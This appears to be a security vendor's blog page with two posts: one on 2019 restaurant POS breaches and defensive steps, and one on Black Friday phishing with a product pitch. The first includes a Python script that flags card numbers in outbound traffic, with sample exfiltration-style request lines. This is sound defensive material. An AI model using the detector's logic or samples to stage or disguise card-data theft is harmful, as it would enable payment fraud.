Other restaurant chains that have been attacked in 2019 include Checker’s Drive-In, Cheddar’s Scratch Kitchen, Huddle House, Applebee’s, Chili’s, and Earl Enterprises (Buca di Beppo, Chicken Guy, Tequila Taqueria, Mixology, Planet Hollywood). Malware on the systems of Earl Enterprises had been present for almost a year before it was detected.
How to Improve Restaurant Cybersecurity
Restaurants process many thousands of card transactions which makes them an attractive target for hackers. Restaurants often use out-of-date operating systems, have vulnerability-ridden legacy hardware, and their cybersecurity solutions often leave a lot to be desired. Consequently, cyberattacks on restaurants are relatively easy to perform, at least compared to many other types of businesses.
To infect the POS system, the attackers need network access. That is most commonly gained via phishing emails, drive-by malware downloads, or by abusing remote access tools. Direct attacks are also possible using techniques such as SQL injection, and weak passwords can easily be guessed using brute force tactics.
The malware that sits on systems and exfiltrates data tends to have a very small footprint and is often stealthy as it needs to be present for long periods of time to collect payment card data. That can make it hard to detect when it has been installed. The key to security is therefore improving defenses to make sure the malware is not installed in the first place, which means preventing the attackers from gaining access to the network.
Listed below are some easy-to-implement steps that will help restaurants improve their security posture and block attacks. The key is defense in depth through layered security.
Use an enterprise-grade firewall – Ensure an enterprise-grade firewall is purchased. A firewall will prevent unauthorized individuals from gaining access to your network resources.
Patch promptly and update all software and firmware – Ensure patches are applied promptly and software and firmware updates are implemented when they are released. That includes all systems and networked devices, not just your POS.
Upgrade hardware – When your hardware is approaching end of life it is time to upgrade. Unsupported hardware (and software) will no longer be updated and vulnerabilities will no longer be fixed.
Lock down your POS – Use whitelisting or otherwise lock down POS systems to make it harder for malware to operate. Only allow trusted apps to run on your POS systems.
Install powerful antivirus software – Ensure all devices are protected by a powerful anti-virus solution and that it is set to update virus definitions automatically. Regularly scan the network for malware, especially your POS.
Implement an intrusion detection system – These systems monitor the network for unusual activity that could indicate a malware infection, attackers searching the network for the POS system, and unusual traffic that could indicate data exfiltration.
Change all default passwords and set strong passwords – To protect against brute force attacks, ensure strong passwords are set on all systems and all default passwords are changed. Also implement rate limiting to block attempts to access a system or device after a set number of failed password attempts.
Implement a powerful spam filtering solution – A powerful email security solution, such as SpamTitan, is required to prevent spam and malicious emails from being delivered to end users. Even if you have Office 365, you will need a third-party email security solution to block email-based threats.
Restrict Internet access with a DNS filter – A DNS filter such as WebTitan provides protection against drive-by malware downloads and web-based phishing attacks. WebTitan will block all known malicious websites and those with a low trust score. The solution can also be configured to prevent employees from accessing categories of websites where malware downloads are more likely.
Disable remote access if possible – Disable Remote Desktop Protocol and all remote access tools. If remote access tools are required to allow essential maintenance work to be completed, ensure they can only be used via a VPN and restrict the people who can use those tools.
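The intrusion detection step above lists unusual outbound traffic as a sign of data exfiltration; for POS malware the tell-tale content is card numbers leaving the network. The Python example below, added here and not part of the original post or of any TitanHQ product, is a simple egress content check of that kind: it finds digit runs shaped like card numbers in outbound request lines, keeps only those that pass the Luhn checksum so that random order ids do not fire, and reports them masked. The sample lines are constructed; the card numbers in them are the standard, publicly documented test values.

```python
import re

# Constructed sample of outbound request lines, as an egress monitor or IDS
# might log them. Only the card numbers on lines 1 and 4 are Luhn-valid;
# the 16-digit order id on line 2 is not and must not raise an alert.
SAMPLE_EGRESS = [
    "POST /collect HTTP/1.1 body=4111111111111111|12/26|DOE/JOHN",
    "GET /menu/specials?order=1234567890123456 HTTP/1.1",
    'POST /api/order HTTP/1.1 body={"total":"42.10","table":7}',
    "POST /upload HTTP/1.1 body=5555-5555-5555-4444;5105 1051 0510 5100",
]

# 13 to 19 digits, optionally separated by single spaces or hyphens, bounded by non-digits
PAN_RE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")


def luhn_valid(digits):
    """Luhn checksum used by payment card numbers; rejects most random digit runs."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # every second digit from the right is doubled
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def find_pans(text):
    """Return the Luhn-valid card-number candidates found in a line, separators removed."""
    pans = []
    for match in PAN_RE.finditer(text):
        digits = re.sub(r"[ -]", "", match.group())
        if 13 <= len(digits) <= 19 and luhn_valid(digits):
            pans.append(digits)
    return pans


def mask(pan):
    """Keep only the BIN and last four so the alert itself does not leak card data."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def scan_egress(lines):
    """Return (line number, masked PANs) for every line carrying at least one valid PAN."""
    alerts = []
    for number, line in enumerate(lines, start=1):
        pans = find_pans(line)
        if pans:
            alerts.append((number, [mask(p) for p in pans]))
    return alerts


if __name__ == "__main__":
    for number, pans in scan_egress(SAMPLE_EGRESS):
        print(f"line {number}: possible card data leaving the network: {', '.join(pans)}")
```

This is a content check, not a replacement for an intrusion detection system: it complements network-level indicators (new destinations, beaconing, traffic at odd hours), tolerates simple separators but not the encoding a scraper may apply to its uploads, and a hit is a reason to investigate the host rather than a verdict.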
Black Friday phishing scams are rife this year. With almost a week to go before the big discounts are offered by online retailers, scammers are stepping up their efforts to defraud consumers.
Spam email campaigns started well ahead of Black Friday this year and the scams have been plentiful and diverse. Black Friday phishing emails are being sent that link to newly created websites that have been set up with the sole purpose of defrauding consumers or spreading malware and ransomware. It may be a great time of year to pick up a bargain, but it is also the time of year to be scammed and be infected with malware.
A wide range of spam emails and scam websites have been detected over the past few weeks, all of which prey on shoppers keen to pick up a bargain. This year has seen the usual collection of almost too-good-to-be-true offers on top brands and the hottest products, free gift cards, money off coupons, and naturally there are plenty of prize draws.
Anyone heading online over the next few days to kick start their holiday shopping spree needs to beware. The scammers are ready and waiting to take advantage. With legitimate offers from retailers, speed is of the essence. There is a limited supply of products available at a discount and shoppers are well aware that they need to act fast to secure a bargain. The scammers are playing the same game and are offering limited time deals to get email recipients to act quickly without thinking, to avoid missing out on an exceptional deal.
This time of year always sees a major uptick in spam and scams, but this year has seen much more sophisticated scams conducted than in previous years. Not only are the scammers insisting on a quick response, several campaigns have been identified that get users to help snag more victims. In order to qualify for special offers or get more deals, the scammers require users to forward messages and share social media posts with their friends and contacts. This tactic is highly effective, as people are more likely to respond to a message or post from a friend.
So how active are the scammers in the run up to Black Friday and Cyber Monday? According to an analysis by Check Point, the number of e-commerce phishing URLs has increased by 233% in November. Those URLs are being sent out in mass spam campaigns to direct people to fake e-commerce sites that impersonate big name brands. Those sites are virtual carbon copies of the legitimate sites, with the exception of the URL.
While consumers must be wary of Black Friday phishing scams and potential malware and ransomware downloads, businesses should also be on high alert. With genuine offers coming and going at great speed, employees are likely to be venturing online during working hours to bag a bargain. That could easily result in a costly malware or ransomware infection.
The scams are not limited to the run up to Black Friday. Cyber Monday scams can be expected and as holiday season fast approaches, cybercriminals remain highly active. It’s a time of year when it pays to increase your spam protections, monitor your reports more carefully, and alert your employees to the threats. A warning email to employees about the risks of holiday season phishing scams and malicious websites could well help to prevent a costly data breach or malware infection.
It’s also a time of year when a web filtering solution can pay dividends. Web filters prevent employees from visiting websites hosting exploit kits, phishing kits, and other known malicious sites. They can also be configured to block downloads of malicious files. A web filter is an important extra layer to add to your phishing defenses and protect against web-based attacks.
If you have yet to implement a web filter, now is the ideal time. TitanHQ is offering a free trial of WebTitan to let you see just how effective it is at blocking web-based threats. What’s more, you can implement the solution in a matter of minutes and get near instant protection from web-based phishing attacks and holiday season malware infections.